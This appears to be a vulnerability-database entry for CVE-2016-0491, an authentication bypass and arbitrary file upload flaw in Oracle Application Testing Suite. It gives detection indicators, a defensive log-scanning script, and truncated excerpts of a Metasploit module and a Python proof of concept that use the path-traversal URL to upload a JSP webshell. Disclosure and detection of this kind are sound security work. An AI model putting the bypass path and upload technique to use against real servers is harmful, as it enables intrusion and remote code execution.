CVE-2016-0491
Published 2016-01-21
Priority P2 · 67 · medium · 6.4 (CVSS 2.0)
AV:N/AC:L/Au:N/C:N/I:P/A:P
EXPLOIT
EPSS: 80.75% (99.6th percentile)
Unspecified vulnerability in the Oracle Application Testing Suite component in Oracle Enterprise Manager Grid Control 12.4.0.2 and 12.5.0.2 allows remote attackers to affect integrity and availability via unknown vectors related to Load Testing for Web Apps. NOTE: the previous information is from the January 2016 CPU. Oracle has not commented on third-party claims that the UploadFileAction servlet allows remote authenticated users to upload and execute arbitrary files via an * (asterisk) character in the fileType parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oracle | application_testing_suite | — | — |
| oracle | application_testing_suite | — | — |
Detection & IOCs
- Detect authentication bypass via path traversal in POST requests to the UploadFileUpload.do servlet using the pattern /olt/Login.do/../../olt/UploadFileUpload.do
- Flag multipart POST requests to UploadFileUpload.do where the 'fileType' parameter contains a literal asterisk (*), which bypasses file extension restrictions
- Alert on HTTP GET requests to /olt/pages/*.jsp following a POST to UploadFileUpload.do, indicating JSP webshell execution
- Check for version string '12.4.0.2.0' in the body of responses from /admin/Login.do to identify vulnerable OATS instances
- Monitor for JSP files written under the WebLogic temp deployment path _WL_user/oats_ee/1ryhnd/war/pages, which is the target drop directory for the webshell
- Successful exploitation results in process running as 'nt authority\system'; monitor for OATS server processes spawning child shells with that privilege level
- The exploit chains CVE-2016-0492 (authentication bypass via path traversal) with CVE-2016-0491 (arbitrary file upload); both CVEs must be present for the full attack chain to succeed
- Confirmed affected version is 12.4.0.2.0; earlier versions may also be vulnerable but were not tested
- The PoC was tested on Win7 SP1 32-bit; the Metasploit module also supports Linux targets with a different directory traversal path
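The first three checks above, sketched as log-analysis code. This is an added example, not taken from any of the cited sources; the log lines and request body are constructed, and it assumes the front end records the request path as received (not normalized) in combined log format.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines; not from a real host.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/May/2016:10:00:01 +0000] "GET /olt/Login.do HTTP/1.1" 200 5120',
    '10.0.0.9 - - [25/May/2016:10:00:07 +0000] "POST /olt/Login.do/../../olt/UploadFileUpload.do HTTP/1.1" 200 312',
    '10.0.0.9 - - [25/May/2016:10:00:09 +0000] "GET /olt/pages/a1b2c3.jsp HTTP/1.1" 200 0',
    '10.0.0.5 - - [25/May/2016:10:00:12 +0000] "GET /olt/pages/index.jsp HTTP/1.1" 200 900',
    '10.0.0.7 - - [25/May/2016:10:00:15 +0000] "POST /olt/Login.do/%2e%2e/%2e%2e/olt/UploadFileUpload.do HTTP/1.1" 200 312',
]

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
TRAVERSAL = "/olt/login.do/../../olt/uploadfileupload.do"
JSP_RE = re.compile(r"^/olt/pages/[^/]+\.jsp$")

def scan(lines):
    """Return (line_no, client, rule) alerts for the access-log patterns listed above."""
    alerts, uploaders = [], set()
    for no, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if not m:
            continue
        client, method, target, _status = m.groups()
        # Decode percent-encoding and fold case so encoded variants match too.
        path = unquote(target.split("?", 1)[0]).lower()
        if method == "POST" and path.endswith("/uploadfileupload.do"):
            uploaders.add(client)  # remember who touched the upload servlet
            if TRAVERSAL in path:
                alerts.append((no, client, "auth-bypass-traversal"))
        elif method == "GET" and JSP_RE.match(path) and client in uploaders:
            alerts.append((no, client, "jsp-after-upload"))
    return alerts

def filetype_has_asterisk(body: bytes) -> bool:
    """True if the multipart field named fileType carries a literal '*' in its value."""
    m = re.search(rb'name="fileType"\r\n\r\n(.*?)\r\n--', body, re.S)
    return bool(m and b"*" in m.group(1))

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The `fileType` check needs the request body, which access logs do not carry, so it belongs in a WAF or proxy that inspects multipart content.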
No detection rules found.
Exploit-DB
Oracle Application Testing Suite (ATS) - Arbitrary File Upload (Metasploit)
exploitdb · 2016-05-25 · CVE-2016-0492
---
```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Oracle ATS Arbitrary File Upload',
  'Description' => %q{
    This module exploits an authentication bypass and arbitrary file upload
    in Oracle Application Testing Suite (OATS), version 12.4.0.2.0 and
    unknown earlier versions, to upload and execute a JSP shell.
  },
  'Author' => [
    'Zhou Yu', # Proof of concept
    'wvu' # Metasploit module
  ],
  'References' => [
    %w{CVE 2016-0492}, # Auth bypass
    %w{CVE 2016-0491}, # File upload
    %w{EDB 39691} # PoC
  ],
  'DisclosureDate' => 'Jan 20 2016',
  'License' => MSF_LICENSE,
  'Platform' => %w{win linux},
  'Arch' => ARCH_JAVA,
  'Privi
```
Exploit-DB
Oracle Application Testing Suite (ATS) 12.4.0.2.0 - Authentication Bypass / Arbitrary File Upload
exploitdb · 2016-04-13 · CVSS 6.4 · CVE-2016-0492 [MEDIUM]
---
```python
# Exploit Title: Oracle Application Testing Suite Authentication Bypass and Arbitrary File Upload Remote Exploit
# Exploit Author: Zhou Yu
# Vendor Homepage: http://www.oracle.com/
# Software Link: http://www.oracle.com/technetwork/oem/downloads/apptesting-downloads-1983826.html?ssSourceSiteId=otncn
# Version: 12.4.0.2.0
# Tested on: Win7 SP1 32-bit
# CVE : CVE-2016-0492 and CVE-2016-0491
import urllib2
import urllib
ip = '192.168.150.239'
port = 8088
url = "http://" + ip + ":" + str(port)
#bypass authentication
url = url+"/olt/Login.do/../../olt/UploadFileUpload.do"
request = urllib2.Request(url)
webshell_content='''
'''
boundary = "---------------------------7e01e2240a1e"
request
```
No writeups or analysis indexed.
- http://packetstormsecurity.com/files/137175/Oracle-ATS-Arbitrary-File-Upload.html
- http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html
- http://www.rapid7.com/db/modules/exploit/multi/http/oracle_ats_file_upload
- http://www.securityfocus.com/bid/81169
- http://www.securitytracker.com/id/1034734
- http://www.zerodayinitiative.com/advisories/ZDI-16-047
- https://www.exploit-db.com/exploits/39691/
- https://www.exploit-db.com/exploits/39852/